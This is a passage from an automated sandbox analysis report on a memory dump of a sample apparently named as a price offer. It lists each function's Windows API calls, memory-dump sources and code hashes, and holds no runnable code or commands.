ClientToScreen.USER32(00000000,?), ref: 00A1174C
GetForegroundWindow.USER32 ref: 00A11752

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 701271d0bf65717374d92ecb99c2ca433bbad2f1bfdc6ae562711609a7cb05ce
Instruction ID: 56a27844342be0f294674723073164dccae35a6460ec15f6d60a2e839de0f26d
Opcode Fuzzy Hash: 701271d0bf65717374d92ecb99c2ca433bbad2f1bfdc6ae562711609a7cb05ce
Instruction Fuzzy Hash: 99313E71D00149AFDB00EFA9C885DEEBBF9EF88304B5080AAE515E7352D631DE45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009ED501
Process32FirstW.KERNEL32(00000000,?), ref: 009ED50F
Process32NextW.KERNEL32(00000000,?), ref: 009ED52F
CloseHandle.KERNEL32(00000000), ref: 009ED5DC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 238ce7125f1f3aafe8e5f7a10c4e86194ca5488e1831894180a16bd19c576827
Instruction ID: 80a62aa46aaf1f652f66445ad0b3c266acbf759f363d77c0a4708dd47c8e1718
Opcode Fuzzy Hash: 238ce7125f1f3aafe8e5f7a10c4e86194ca5488e1831894180a16bd19c576827
Instruction Fuzzy Hash: 1831AD71008340AFD301EF94C885BBFBBE8EFD9354F14092DF581862A1EB719A49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A18FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

GetCursorPos.USER32(?), ref: 00A19001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009D7711,?,?,?,?,?), ref: 00A19016
GetCursorPos.USER32(?), ref: 00A1905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009D7711,?,?,?), ref: 00A19094

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8cd5f7ea6bd16e263b7901033580346604bf38e4e7cb96c35120ca931b29ee98
Instruction ID: 47df6954838f89f23c6b295b717f04fc7a202d7093df092a66edbcb27518be9e
Opcode Fuzzy Hash: 8cd5f7ea6bd16e263b7901033580346604bf38e4e7cb96c35120ca931b29ee98
Instruction Fuzzy Hash: 67217C35600128EFCB25CF98C868FFB7BBAEB89361F044069F90547261C3359D91DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A1CB68), ref: 009ED2FB
GetLastError.KERNEL32 ref: 009ED30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 009ED319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A1CB68), ref: 009ED376

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 450494d2772b84023eaf6d98c6027f042b35508169304e0725d94acef41cf869
Instruction ID: 5ff8bcc32dc4bf1c10b3387dcf50f28f7558307db83f4c1ab751133e1946e322
Opcode Fuzzy Hash: 450494d2772b84023eaf6d98c6027f042b35508169304e0725d94acef41cf869
Instruction Fuzzy Hash: 8D21B17450A2019FC300EF25C8818AEB7E8AF9A368F105A1DF499C72E1E730DD46CB93

Uniqueness

Uniqueness Score: -1.00%

Function 009E1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009E102A
Part of subcall function 009E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009E1036
Part of subcall function 009E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1045
Part of subcall function 009E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009E104C
Part of subcall function 009E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009E15BE
_memcmp.LIBVCRUNTIME ref: 009E15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E1617
HeapFree.KERNEL32(00000000), ref: 009E161E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 849e8511ea97bf1fa43b9259eed6bb064c82e2f9f17adc2464a949754ff63c75
Instruction ID: e37cacba53d03b9c2bac789893ef5ec1365bfd653d11994383d91cd3b203f485
Opcode Fuzzy Hash: 849e8511ea97bf1fa43b9259eed6bb064c82e2f9f17adc2464a949754ff63c75
Instruction Fuzzy Hash: 9E21AC31E40209EFDF05DFA6C945BEEB7B8EF84354F088459E445AB241EB30AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A12782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00A1280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A12824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A12832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A12840

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 473e7940905b01acc26a9224f963632761fce74538b22835c6a654286d700c2b
Instruction ID: a9a56803b3d78c4a33d9a96f3a1725dfbaed56a6d211085a67a556483035e3b9
Opcode Fuzzy Hash: 473e7940905b01acc26a9224f963632761fce74538b22835c6a654286d700c2b
Instruction Fuzzy Hash: 5F21B035244511AFE714DB24C845FEA7BAAAF85324F148158F4268B6E2CB71FC92CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 009E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009E790A,?,000000FF,?,009E8754,00000000,?,0000001C,?,?), ref: 009E8D8C
Part of subcall function 009E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 009E8DB2
Part of subcall function 009E8D7D: lstrcmpiW.KERNEL32(00000000,?,009E790A,?,000000FF,?,009E8754,00000000,?,0000001C,?,?), ref: 009E8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009E8754,00000000,?,0000001C,?,?,00000000), ref: 009E7923
lstrcpyW.KERNEL32(00000000,?), ref: 009E7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,009E8754,00000000,?,0000001C,?,?,00000000), ref: 009E7984

Strings

cdecl, xrefs: 009E797B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: c6c0e5aa30067e024d9502509067bd0261336285726cec65e67ef8143c23d5bf
Instruction ID: cfd39c45fe6bdc7000232f299f2376ad23ff27c306c7aa5095dac41c0207cf56
Opcode Fuzzy Hash: c6c0e5aa30067e024d9502509067bd0261336285726cec65e67ef8143c23d5bf
Instruction Fuzzy Hash: 2011E93A200381ABCB169FB9DC45E7BB7A9FF85350B50802AF946C72A5EB319C11C752

Uniqueness

Uniqueness Score: -1.00%

Function 00A17CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00A17D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A17D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A17D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009FB7AD,00000000), ref: 00A17D6B

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: a265ecbf19d75d170229ce29caa016894ae49910957629b86edfa28a65b73aee
Instruction ID: 9806152d2e6c5495448c874b449d512e3679152ce8171c90d0a3183b966752a1
Opcode Fuzzy Hash: a265ecbf19d75d170229ce29caa016894ae49910957629b86edfa28a65b73aee
Instruction Fuzzy Hash: 18118C31645619AFCB109F68DC04ABA3BB5BF45375B159724F839C72E0D7309991CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A15660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00A156BB
_wcslen.LIBCMT ref: 00A156CD
_wcslen.LIBCMT ref: 00A156D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A15816

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 5ecaaf5ee138d23bcaaef3967b3d2861a7a00e7d6c9e8f37944fee612e49ffbd
Instruction ID: 5f8ca1f545829b3da26dd4dbcafe609526cbe4beb5fa2f933199f1d35aa057ac
Opcode Fuzzy Hash: 5ecaaf5ee138d23bcaaef3967b3d2861a7a00e7d6c9e8f37944fee612e49ffbd
Instruction Fuzzy Hash: CF11B471E00604DADF20DFB5CC85AEE777CAF95764B108026F915D6081E77489C4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009B1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9198d1c6110e3f61ab4b4d77651d753a666eeecb0b5a216b49e0fe8e03c6b7
Instruction ID: 3838314a6ae8aadb1db9e5d47f2256a6db90615c5fcb3b80f445f6e5106e9778
Opcode Fuzzy Hash: 0a9198d1c6110e3f61ab4b4d77651d753a666eeecb0b5a216b49e0fe8e03c6b7
Instruction Fuzzy Hash: B801ADB220A61A7FF6212AB86DD0FE7671CEFC17B8F740725F521A11D2DB608C005160

Uniqueness

Uniqueness Score: -1.00%

Function 009E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 009E1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A8A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4aa99e840b01aaf418895167989a434da2328ffe94b3baeb72c5619a38587d5e
Instruction ID: e82ecf9922219db65762784fcee6ebd7ff602adee1aab3dc3212097b915b1ac4
Opcode Fuzzy Hash: 4aa99e840b01aaf418895167989a434da2328ffe94b3baeb72c5619a38587d5e
Instruction Fuzzy Hash: 0D11393AD01219FFEF11DBA5CD85FADBB78EB08750F2000A1EA00B7290D6716E50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 009EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009EE1FD
MessageBoxW.USER32(?,?,?,?), ref: 009EE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009EE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009EE24D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 75961d5441b2b0721e190de313784a8e18bbaa75e9ee4a3367dfc4ab741e80cc
Instruction ID: 772f70c51c918d8591f6f8c7366fc7fc4240ae5f78ed25b4be88e948d1d26551
Opcode Fuzzy Hash: 75961d5441b2b0721e190de313784a8e18bbaa75e9ee4a3367dfc4ab741e80cc
Instruction Fuzzy Hash: 3B1104B6904254BBC702DFE89C09BEE7FACAB85331F008215F924E7390D2B0CE0587A0

Uniqueness

Uniqueness Score: -1.00%

Function 009AD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,009ACFF9,00000000,00000004,00000000), ref: 009AD218
GetLastError.KERNEL32 ref: 009AD224
__dosmaperr.LIBCMT ref: 009AD22B
ResumeThread.KERNEL32(00000000), ref: 009AD249

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: a0e19dd01cd094da5b5815d18560a2a4c5a98fa0326efc3a4a272e4f35353d0c
Instruction ID: 3dc192258b9da97fcf42498adef3a6c843b4fd56d38215207e64bd98d85ddcef
Opcode Fuzzy Hash: a0e19dd01cd094da5b5815d18560a2a4c5a98fa0326efc3a4a272e4f35353d0c
Instruction Fuzzy Hash: 6801C076846214BBCB216BA5DC09BAA7A6DDFC3730F104229FD36965D0DB708901C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A19EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

GetClientRect.USER32(?,?), ref: 00A19F31
GetCursorPos.USER32(?), ref: 00A19F3B
ScreenToClient.USER32(?,?), ref: 00A19F46
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00A19F7A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0d193c89ee80233fb1a713a01c086cffa1fd1aa5f41937df63f11e4f13abd87d
Instruction ID: 3d730f0df30949f546e41db330bdea4bf452312f4e803206cb8dbb0ced9d29df
Opcode Fuzzy Hash: 0d193c89ee80233fb1a713a01c086cffa1fd1aa5f41937df63f11e4f13abd87d
Instruction Fuzzy Hash: 1F11153290021ABBDB10DFA8D9999FE77B9FB45321F504455F912E3150D730BAC6CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0098600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
GetStockObject.GDI32(00000011), ref: 00986060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 445a86cec29187f79223c6c8af230cf554884e7560c71b496289fca1cdbcdfd0
Instruction ID: d9565c9f7d8c06521cae3fffbba5f655c727fc8605a096836f330a70943a401a
Opcode Fuzzy Hash: 445a86cec29187f79223c6c8af230cf554884e7560c71b496289fca1cdbcdfd0
Instruction Fuzzy Hash: A011AD72501508BFEF129FA58C44FEABB6DFF083A4F004205FA1556210D7369C60DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 009A3B56

Part of subcall function 009A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009A3AD2
Part of subcall function 009A3AA3: ___AdjustPointer.LIBCMT ref: 009A3AED

_UnwindNestedFrames.LIBCMT ref: 009A3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 009A3B7C
CallCatchBlock.LIBVCRUNTIME ref: 009A3BA4

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 83401c591d6cd1615c461c3ea846b7023fd8ed85def1b664522ca59c3b3639a8
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 52014C32100148BBDF125E95DC46EEB7F6EEF8A754F058014FE5866121C772E961DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 009B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009813C6,00000000,00000000,?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue), ref: 009B30A5
GetLastError.KERNEL32(?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue,00A22290,FlsSetValue,00000000,00000364,?,009B2E46), ref: 009B30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue,00A22290,FlsSetValue,00000000), ref: 009B30BF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
